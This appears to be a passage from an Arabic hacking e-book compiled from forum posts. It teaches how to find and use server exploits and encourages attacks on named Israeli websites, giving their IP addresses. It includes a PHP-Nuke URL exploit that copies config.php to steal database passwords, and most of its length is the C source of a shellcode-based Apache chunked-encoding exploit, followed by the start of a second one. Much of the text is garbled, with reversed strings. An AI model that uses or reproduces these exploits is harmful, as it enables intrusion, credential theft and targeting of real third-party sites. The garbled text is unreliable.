بواسطه مل ف معین یجعكتستطیعالدخولبواسطهال httpبصوره طبیعبه<br />

لذلك نستخدم scannerلب حث عن هذاالاستثمار ‏....یو جد العدید منالاستثمارات مثل<br />

..<br />

BOF (buffer over flow) , DoS ( denial of service) ,<br />

...<br />

....<br />

و علىفكرهاناااؤمنانال هجومال DoSهياكسبلویت<br />

و یوجدایضا الثغراتالتي تتیحلكتنفیذ بع ضالاوامر مثل عر ض و مسح والكتایه علىالملفات<br />

م ثالاكستینشنز و غیرها بالنسبهلموضو عالبوفراوفرفلوفهو یشبهالى حدكبیر<br />

حی ثیعتمد علىارباكالسیرفیر بفی ض من المعلومات و یمن حك الروو ت.‏<br />

اما هجومال DoSفهو عباره عنارسال GETال / POST السیرفیر مما یؤديال<br />

حدو ث OVERLOADلوحدهالمعالجهالمركزیهللسیرفیر اللي هو عباره عن جهاز یعمل<br />

‎24‎ساعه ‏)فیتوق ف الموقع عنالعمل و یصبحالسیرفیر....‏ OFFLINE<br />

)<br />

ال DoS<br />

××××××××××××××××××××××××××××××××××××××××××××××××××<br />

<strong>١</strong>- كی فتجداستثمارات ؟<br />

لكيتستطیعانتستثمرثغرهمعینهفي سیرفیرفانه یجب علیك اولاان تتاكدانالثغره موجودهفي<br />

السیرفیر<br />

ولماكانالاستثمار عباره عنفایل معین ‏..فانه یوجد طریقتینلمعرفه مااذاكانتالثغره موجودهام لا..‏<br />

اما عن طریق التطبیق مباشره من خلالالمتصفحكمافي حاله بع ضثغ را تامتصفح مثلالیونیكوداو<br />

الفرون تبیج<br />

اوانتستخدمالسكانرزفيفح ص الموقع .. طبعا منالمعرو فانثغرات المتصفحلها سكانرزال<br />

threads<br />

و هيتسمىال cgi scaners بعضها ممكنانتضی فله ملفاتبهاثغرات والبع<br />

احبذه


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

red hat 7.2 ......<br />

××××××××××××××××××××××××××××××××××××××××××××××<br />

‎٢‎‏-كی فتستغل هذهالثغرات ؟؟<br />

الكثیر منالناس عندما یف حصون موقعبسكانر ‏(و خاصهال ) shadow و یطلعلهماستثماراتمعینه<br />

‏..لایعرفونای ش یسوون<br />

بعدكذا؟؟؟؟...‏<br />

لوانت بتستعملالشادو حتلاقي urlبجانبالثغره تزرو العنوان ده وتقرهكلكلمهتلاقیها هناك<br />

اواذالمتجداي urlفيالسكانرزالاخر ى یبقىتاخداسم اثغره وتروحالموقع rootshell.<strong>com</strong><br />

وتكتبفي محركالب حثاسمالثغره و ان تان شاءااللهفي ٩٩% من الحالات بتلاقياستثمارلهاي<br />

الثغره..‏<br />

وكی فتستخدمها واشیاء زيكده.......‏<br />

..<br />

..<br />

×××××××××××××××××××××××××××××××××××××××××××××<br />

:<br />

-٣<br />

..<br />

....<br />

..<br />

انوا ع مختلفه منالاستثمارات<br />

طبعاالكثیر منالاستثمارات یكون هدفها هو من حك الرووت علىالسیرفیر .. معنىكلمه رووتهو المدیر<br />

اوالادمین ‏..لا یوجدايقیود علىال <strong>com</strong>mands اللي الرووت یكتبها ايلككلالصلاحیات على<br />

السیرفیر<br />

وال حصول على الرووت یمكنانیتم من خلال العدید من الثغرات مثلثغراتال , httpوال BOF و<br />

غیرها<br />

كهاتعتمد على طریقه عملالثغرات ‏..فهيقدتعطيلك صلاحیهقراءه و حذ ف والكتابه عل الملفات و<br />

ایضا<br />

رفع ملفاتالىالسیرفیر<br />

اوقدتعطيلك الكلمه السریه واسمالیوزرامافي صوره واضحه مثلالمل ف config.inc او مشفره<br />

بمقیاس<br />

... DES/MD5‎كمافي المل ف .... etc/passwd‏/فيانظمهالیونیك س...‏<br />

بالنسبهللبفراوفرفلوفهو یشبه الى حدكبیر هجومال DoS ولكنه لا یسبب ضررللسیرفیر مثلما یسببه<br />

هجومال DoSالمهمانهفياغلبالاحیان یكون البفر عباره عنارسالاوامرللسیرفیرتنتهي دائما<br />

باعطائك<br />

صلاحیهالرووت ... و هذابسبباستقبالالسیرفیرلكم هائل من الداتافیؤدي الىارباكالسیرفیر..‏<br />

××××××××××××××××××××××××××××××××××××××××××××××××××<br />

×××××××××××××××××××××××××××××××××<br />

:<br />

-٤<br />

:<br />

packetstorm.securify.<strong>com</strong> /.securityfocus.<strong>com</strong> /www.insecure.org<br />

‏/‏http://rootshell.redi.tkو غیرهاابحث سو فتجدالمزید :)....<br />

مواقع مفیدهللب حث عنالثغرات من خلالها<br />

یمكنك الب حث عنالاستثمارات الجدیدهفي هذه المواقع<br />

٢٠٧


hi_HaCkEr & MaXhAk2000<br />

"<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" كیف تستخدم الثغرات<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$<br />

الكاتب:‏ VoOoDa BE$T<br />

$$$$$$$$$$$$$$$$$<br />

البدایة :<br />

txt. :<br />

ویعني مل ف مل ف نصي..من الممكناي یحتوي على سورسكودلبع ض الثغراتاو البرامجالمكتوبة<br />

بالسي اكمل القراءة لتعر فكیفیةاستخدامها..‏<br />

، البیر..‏<br />

<br />

c. :<br />

هوبرنامج سيلكنه سورسكودفقط..واغلب الثغراتیتم كتابتهابالسي..هذا یفتر ض علیك<br />

علیكتحمیلهثم عمل (<strong>com</strong>pile) ‏_وهذایعنيتحویلالسورسكودلمل ف برنامج)_ثمتثوم<br />

بتشغیله...‏ لكن المشكلةهناانهلن یمكنتشغیلهاتح تبیئة ویندوز..فیجبان یكون عندك Linuxاو<br />

)<br />

.. Shell Account<br />

بع ضالتحمیلتوجهللمسارالموجودبه المفلثماكتب:‏<br />

‏----


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

تمتع بإختراق المواقع الإسرائیلیة مع هذه الثغرة<br />

"<br />

$$$$$$$$$$$$$<br />

الكاتب DeadLine:<br />

$$$$$$$$$$$$$<br />

الشرح<br />

اولاً‏ الثغره یاأخوانتطبق على سیرفرات<br />

:<br />

:<br />

Microsoft-IIS/5.0 on Windows 2000<br />

یاأخوانكل مانحتاجه هياداهبسیطه یقدمهالنا وندوز ٩٨ وانني لااعلمانكانتالنسخالاخرىتمتلك<br />

مثل هذهلخاصیهام لا لاننياعمل على نظامینفقطلینكس ماندریك ووندوز‎٩٨‎فقط<br />

:<br />

الاداه هيFolders : Web<br />

این نجد هذه الثغره :<br />

حسناً‏ سو ف نجدهاانشاءاللهفي الخطوات التالیه<br />

:<br />

ادخل على My Computer<br />

ثم ستجدهاهناكلیس داخل السياو شيء آخربل داخل Myفق Computer طیعنيتكون هي معالسي<br />

والدي الى آخره<br />

نفتح یاأخونالمل ف المسمى Web Folders<br />

ثم سنجدالآتي<br />

:<br />

Add Web Folder حیثهي التي ستكوناداتنا المهمهللاختراق<br />

نفتحال : Folder Add Web<br />

حیث نجدكلمة Type the location to add<br />

ونرىتحتها مستطیل نقوم بأدخالالآتي<br />

:<br />

http://hostname.<strong>com</strong>/<br />

حیثان hostnameهوایبيالموقعانتبهقلناایبي الموقع ولیسالاسم<br />

والجمیعیعر فكی ف یخرجالایبيتبعالموقع وهناك دروسكثیرهبخصو ص هذاالموضو ع<br />

وهذه مواقعاسرائیلیهللتطیب ق حیثانهاتعمل علىایبي موحد<br />

:<br />

mail.talcar.co.il<br />

daihatsu-israel.co.il<br />

daewoo-israel.co.il<br />

٢٠٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ندخلبالمستطیلالذيتم ذكره<br />

:<br />

http://192.117.143.121/<br />

ثم نضغط علىكلمة : Next<br />

وهنا سو فتعملالاداه بتحمیل ملفات الموقعوتعطیك خاصیةالادمن وهيتحمیل وازالة الملفات<br />

فبعدان ینتهي البرنامج منالتحمیلتظهرلككلمة : finish<br />

عندهاتذهب الىال : Web Folder وتجد مل فالموقع هناك ومسمىتحتایبي الموقع<br />

موقعاخرللتطبیق<br />

212.199.43.84http://www.israwine.co.il/<br />

:<br />

ملاحظه ‏:اذاتم طلبادخالباسوورد ویوزر نیمفأعر فانالثغره مغلقه<br />

اواذا دخلتالى الملفات ولمتجداي ملففمعناهانالثغره مغلقهایضاً‏<br />

اسئلااللهالتوفیق والعافیهاللهمامیناللهمامین...‏<br />

٢<strong>١</strong>٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

‏"ثغرة نیوك "<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$<br />

الكاتب:‏ Arab VieruZ<br />

$$$$$$$$$$$$$$$<br />

الشرحبالأنقلیزیة :<br />

day from LucisFero and supergate٠here your :twlc<br />

CDT <strong>١</strong>٤:٢٥:٥٨ @ ٢٤ Posted on Monday, September<br />

advisories :topic<br />

twlc security divison<br />

٢٠٠<strong>١</strong>/٠٩/٢٤<br />

.Php nuke BUGGED<br />

:Found by<br />

LucisFero and supergate<br />

twlc/.<br />

Summary<br />

it allows you to 'cp' any file on ...This time the bug is really dangerous<br />

...or even upload files ...the box<br />

is<br />

٥٫٢is ok while the final<br />

dSystems Affecte<br />

all the versions ARE vulnerable<br />

.i wonder why a released c) '<strong>١</strong>RC ٥٫٠ except '<br />

(bugged<br />

Explanation<br />

Do you need sql password?<br />

<strong>١</strong>=php?upload.admin/net.server.www//:http<br />

config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&<br />

txt .hacked=php&userfile_name.<br />

the admin 'login' page will be prompted just go to<br />

php .txt and you will see config.hacked/images/net.server.www//:http<br />

that as everyone knows contain the sql's passwords, you can even<br />

and try ...un' to find all the ways to use iti leave you the 'f...upload files<br />

to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs<br />

.php nuke and NOT TO LET YOU HAVE FUN<br />

٢<strong>١</strong><strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

:php contains this routine.admin ...let me explain you the bug<br />

ridesab$ EMANELIF_TPIRCS$)dirname؛)‏ =<br />

=extrows t$<br />

= sloctxet$<br />

= ridu$<br />

"/"=ridw$ (ridw$!)if<br />

‏$‏FileManager"=po؛"‏ (lecnac$)if<br />

} (daolpu$)if<br />

؛‎٢٠‎<br />

؛‎٨٥‎<br />

FLES_PHP$)dirname؛)‏<br />

؛<br />

eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)‏<br />

noitcatsal$ ‏$‏ridw؛"‏


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

٤٢<strong>١</strong> =php?sid.article/net.twlc.www//:net article http.twlc.www//:http<br />

<strong>com</strong>.bugtraq@securityfocus<br />

-good luck-org .phpnuke.www//:http<br />

Nuke Web -PHP :Project ٧٥<strong>١</strong><strong>١</strong>=di_puorg؟/tracker/net.sourceforge//:http<br />

Portal System<br />

and of course mailed to the author of php nuke<br />

remember that trojans are<br />

...bugs, ideas, insults, cool girls)tacts con<br />

:(null/dev/directed to<br />

net.lucisfero@twlc<br />

net.supergate@twlc<br />

(yes we are patched)net .twlc.www//:http<br />

.bella a tutti .peace out pimps<br />

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />

=-=-=-=-=-=-=-=-=-=-=-=<br />

الخطأ البرمجي :<br />

eof<br />

ridesab$ EMANELIF_TPIRCS$)dirname؛)‏ =<br />

= swortxet$<br />

= sloctxet$<br />

= ridu$<br />

"/"=ridw$ (ridw$!)if<br />

‏$‏FileManager"=po؛"‏ (lecnac$)if<br />

} (daolpu$)if<br />

؛‎٢٠‎<br />

؛‎٨٥‎<br />

FLES_PHP$)dirname؛)‏<br />

؛<br />

eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)‏<br />

noitcatsal$ ‏$‏ridw؛"‏


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

FileManager=php?op.admin :Location")Header ؛")‏<br />

exit;<br />

{<br />

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />

=-=-=-=-=-=-=-=-=-=-=-=<br />

الثغرة :<br />

<strong>١</strong>=php?upload.admin/net.server.www//:http<br />

config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&<br />

txt.hacked=erfile_namephp&us.<br />

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />

=-=-=-=-=-=-=-=-=-=-=-=<br />

الثغرة بعد التعدیل<br />

<strong>١</strong>=php?upload.admin/net.server.www//:http<br />

php.config=elifresu&/=txt&wdir.ultramode=php&file_name.config=elif&<br />

txt.ultramode=eman_elifresu&<br />

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />

=-=-=-=-=-=-=-=-=-=-=-=<br />

عملالثغرة:‏<br />

-= طبع مل فالكونفیج php.config الى المل فالنصيالموجودtxt.ultramodeلنتحتاجتحمیل<br />

مل ف نصيلطبعالمل ف<br />

كما هو موجودبالشرحالأنقلیزيیعنيفكر واستنتج :-) ولأن بع ض المواقعتمنعالتحمیلالىالموقعالآن<br />

ما علیك سو ىالدخولالى txt.ultramode/<strong>com</strong>.server//:http<br />

وستجدباس والیوزر التابعلقاعدةبیاناتالموقع=-‏<br />

ملاحظات<br />

‎<strong>١</strong>‎‏-بدل <strong>com</strong>.serverبالموقع الراداختراقه<br />

‎٢‎‏-تأكد من موقع المجلة مثال<br />

nuke/<strong>com</strong>.server//:ttph :<br />

٣- هذه الثغرةلاتعمل معاصدار‎٥٫٢‎كما یظنالبع ض...‏<br />

٢<strong>١</strong>٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

ثغرة<br />

" Chunked<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$$$$$<br />

angels-bytes<br />

$$$$$$$$$$$$$$$$$$$$$<br />

منقول من موقع<br />

كلنا سمع بثغرهتسمى Chunkedل ، Apache السبب لعدمتحد ث موقع angels-bytes عنها هو<br />

أنها أتتقبلإنطلاقالموقع ‏،الآ ن سأضع ، Scanner Retina Apache Chunked وهيأداة<br />

تقوم بفح ص نطاق من ٢٥٤ عنوان آيبي ، وتظهرلك ما منها مصاببهذهالثغره.‏<br />

إ ذاأردتمعالجة هذهالثغره عند وجودهافأنص حك بتنزیلأباتشي ‎٢٫٠٫٣٩‎فهو الأفضلالى الآن<br />

هذه هي وصلةالتنزی ل<br />

http://www.apache.org/dist/httpd/binaries<br />

أمالمسألة إ ستثمار هذهالثغرهفسو فأضعلكمأفضلأستثمارین<br />

الخطأفيأباتشي 1.3.24 واعلىإلى‎٢‎ و من‎٢‎إلى ، ٢٫٠٫٣٦ dev‏-وهيفيالروتین البرمجي الذي<br />

یتعامل مع رسائلالخطأ<br />

هذان ا لإ ستثمارانتستخدمان منقبل مهاجم بعید لتسبب طفح م حليفيالسیرفرالمصاب ، مؤدیهبذلكإلى<br />

إعادة كتابهفي الذاكرة ، وبطریقة ماتسمح لتنفیذكود<br />

/*((<br />

*/<br />

/*<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

قدتمتجریبها وإختبارها منقبل angels-bytes.<strong>com</strong>قبل وضعهالكمهنا<br />

حصلنا علیها من سیكورتيتیم*/‏<br />

((<br />

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming<br />

it failed */<br />

٢<strong>١</strong>٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

#define RET_ADDR_INC 512<br />

#define MEMCPY_s1_OWADDR_DELTA -146<br />

#define PADSIZE_1 4<br />

#define PADSIZE_2 5<br />

#define PADSIZE_3 7<br />

#define REP_POPULATOR 24<br />

#define REP_RET_ADDR 6<br />

#define REP_ZERO 36<br />

#define REP_SHELLCODE 24<br />

#define NOPCOUNT 1024<br />

#define NOP 0x41<br />

#define PADDING_1 \\'A\\'<br />

#define PADDING_2 \\'B\\'<br />

#define PADDING_3 \\'C\\'<br />

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);<br />

#define PUT_BYTES(n, b) memset(p, b, n); p += n;<br />

#define SHELLCODE_LOCALPORT_OFF 30<br />

char shellcode[] =<br />

\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\<br />

\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\<br />

\\x1f\\\"<br />

\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\<br />

\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\<br />

\\x02\\\"<br />

\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\<br />

\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\<br />

\\x04\\\"<br />

\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\<br />

\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\<br />

\\xb8\\\"<br />

\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\<br />

\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\<br />

\\x03\\\"<br />

\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\<br />

٢<strong>١</strong>٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\<br />

\\x89\\\"<br />

\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\<br />

\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\<br />

\\x80\\\"<br />

\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\<br />

\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\<br />

\\x50\\\"<br />

\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\<br />

\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\<br />

\\xcc\\\";<br />

struct {<br />

char *type;<br />

u_long retaddr;<br />

} targets[] = { // hehe, yes theo, that say OpenBSD here!<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },<br />

};<br />

int main(int argc, char *argv[]) {<br />

char *hostp, *portp;<br />

unsigned char buf[512], *expbuf, *p;<br />

int i, j, lport;<br />

int sock;<br />

int bruteforce, owned, progress;<br />

u_long retaddr;<br />

struct sockaddr_in sin, from;<br />

if(argc != 3) {<br />

printf(\\\"Usage: %s \\\\n\\\", argv[0]);<br />

printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\");<br />

printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000<br />

٢<strong>١</strong>٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

127.0.0.1:8080\\\\n\\\");<br />

printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\");<br />

printf(\\\"Target ID / Target specification\\\\n\\\");<br />

for(i = 0; i < sizeof(targets)/8; i++)<br />

printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type);<br />

return -1;<br />

}<br />

hostp = strtok(argv[2], \\\":\\\");<br />

if((portp = strtok(NULL, \\\":\\\")) == NULL)<br />

portp = \\\"80\\\";<br />

retaddr = strtoul(argv[1], NULL, 16);<br />

if(retaddr < sizeof(targets)/8) {<br />

retaddr = targets[retaddr].retaddr;<br />

bruteforce = 0;<br />

}<br />

else<br />

bruteforce = 1;<br />

srand(getpid());<br />

signal(SIGPIPE, SIG_IGN);<br />

for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {<br />

/* skip invalid return adresses */<br />

i = retaddr & 0xff;<br />

if(i == 0x0a || i == 0x0d)<br />

retaddr++;<br />

else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))<br />

continue;<br />

sock = socket(AF_INET, SOCK_STREAM, 0);<br />

sin.sin_family = AF_INET;<br />

sin.sin_addr.s_addr = inet_addr(hostp);<br />

sin.sin_port = htons(atoi(portp));<br />

if(!progress)<br />

printf(\\\"\\\\n[*] Connecting.. \\\");<br />

٢<strong>١</strong>٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

fflush(stdout);<br />

if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {<br />

perror(\\\"connect()\\\");<br />

exit(1);<br />

}<br />

if(!progress)<br />

printf(\\\"connected!\\\\n\\\");<br />

/* Setup the local port in our shellcode */<br />

i = sizeof(from);<br />

if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {<br />

perror(\\\"getsockname()\\\");<br />

exit(1);<br />

}<br />

lport = ntohs(from.sin_port);<br />

shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;<br />

shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;<br />

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *<br />

REP_SHELLCODE)<br />

+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *<br />

REP_POPULATOR));<br />

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\");<br />

for (i = 0; i < REP_SHELLCODE; i++) {<br />

PUT_STRING(\\\"X-\\\");<br />

PUT_BYTES(PADSIZE_3, PADDING_3);<br />

PUT_STRING(\\\": \\\");<br />

PUT_BYTES(NOPCOUNT, NOP);<br />

memcpy(p, shellcode, sizeof(shellcode) - 1);<br />

p += sizeof(shellcode) - 1;<br />

PUT_STRING(\\\"\\\\r\\\\n\\\");<br />

}<br />

for (i = 0; i < REP_POPULATOR; i++) {<br />

PUT_STRING(\\\"X-\\\");<br />

PUT_BYTES(PADSIZE_1, PADDING_1);<br />

٢<strong>١</strong>٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

PUT_STRING(\\\": \\\");<br />

for (j = 0; j < REP_RET_ADDR; j++) {<br />

*p++ = retaddr & 0xff;<br />

*p++ = (retaddr >> 8) & 0xff;<br />

*p++ = (retaddr >> 16) & 0xff;<br />

*p++ = (retaddr >> 24) & 0xff;<br />

}<br />

PUT_BYTES(REP_ZERO, 0);<br />

PUT_STRING(\\\"\\\\r\\\\n\\\");<br />

}<br />

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");<br />

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);<br />

PUT_STRING(buf);<br />

PUT_BYTES(PADSIZE_2, PADDING_2);<br />

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",<br />

MEMCPY_s1_OWADDR_DELTA);<br />

PUT_STRING(buf);<br />

write(sock, expbuf, p - expbuf);<br />

progress++;<br />

if((progress%70) == 0)<br />

progress = 1;<br />

if(progress == 1) {<br />

memset(buf, 0, sizeof(buf));<br />

sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport<br />

%u\\\",<br />

retaddr, (unsigned int)(p - expbuf), lport);<br />

memset(buf + strlen(buf), \\' \\', 74 - strlen(buf));<br />

puts(buf);<br />

if(bruteforce)<br />

putchar(\\';\\');<br />

}<br />

else<br />

putchar((rand()%2)? \\'P\\': \\'p\\');<br />

fflush(stdout);<br />

while (1) {<br />

٢٢٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

fd_set fds;<br />

int n;<br />

struct timeval tv;<br />

tv.tv_sec = EXPLOIT_TIMEOUT;<br />

tv.tv_usec = 0;<br />

FD_ZERO(&fds);<br />

FD_SET(0, &fds);<br />

FD_SET(sock, &fds);<br />

memset(buf, 0, sizeof(buf));<br />

if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {<br />

if(FD_ISSET(sock, &fds)) {<br />

if((n = read(sock, buf, sizeof(buf) - 1)) = 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0) {<br />

printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n\\\");<br />

printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr);<br />

sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD<br />

local kernel exploit to gain instant r00t\\\\n\\\");<br />

write(sock, expbuf, strlen(expbuf));<br />

owned++;<br />

}<br />

write(1, buf, n);<br />

}<br />

if(FD_ISSET(0, &fds)) {<br />

if((n = read(0, buf, sizeof(buf) - 1)) < 0)<br />

exit(1);<br />

write(sock, buf, n);<br />

}<br />

}<br />

if(!owned)<br />

break;<br />

}<br />

free(expbuf);<br />

٢٢<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

close(sock);<br />

if(owned)<br />

return 0;<br />

if(!bruteforce) {<br />

fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");<br />

return -1;<br />

}<br />

}<br />

return 0;<br />

}<br />

Exploit #2:<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#include<br />

#ifdef __linux__<br />

#include<br />

#endif<br />

#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */<br />

#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another<br />

bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n\\\"<br />

#define RET_ADDR_INC 512<br />

#define PADSIZE_1 4<br />

#define PADSIZE_2 5<br />

#define PADSIZE_3 7<br />

٢٢٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

#define REP_POPULATOR 24<br />

#define REP_SHELLCODE 24<br />

#define NOPCOUNT 1024<br />

#define NOP 0x41<br />

#define PADDING_1 \\'A\\'<br />

#define PADDING_2 \\'B\\'<br />

#define PADDING_3 \\'C\\'<br />

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);<br />

#define PUT_BYTES(n, b) memset(p, b, n); p += n;<br />

char shellcode[] =<br />

\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\<br />

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\<br />

\\x04\\\\x24\\\"<br />

\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\<br />

\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\<br />

\\xea\\\\x31\\\"<br />

\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\<br />

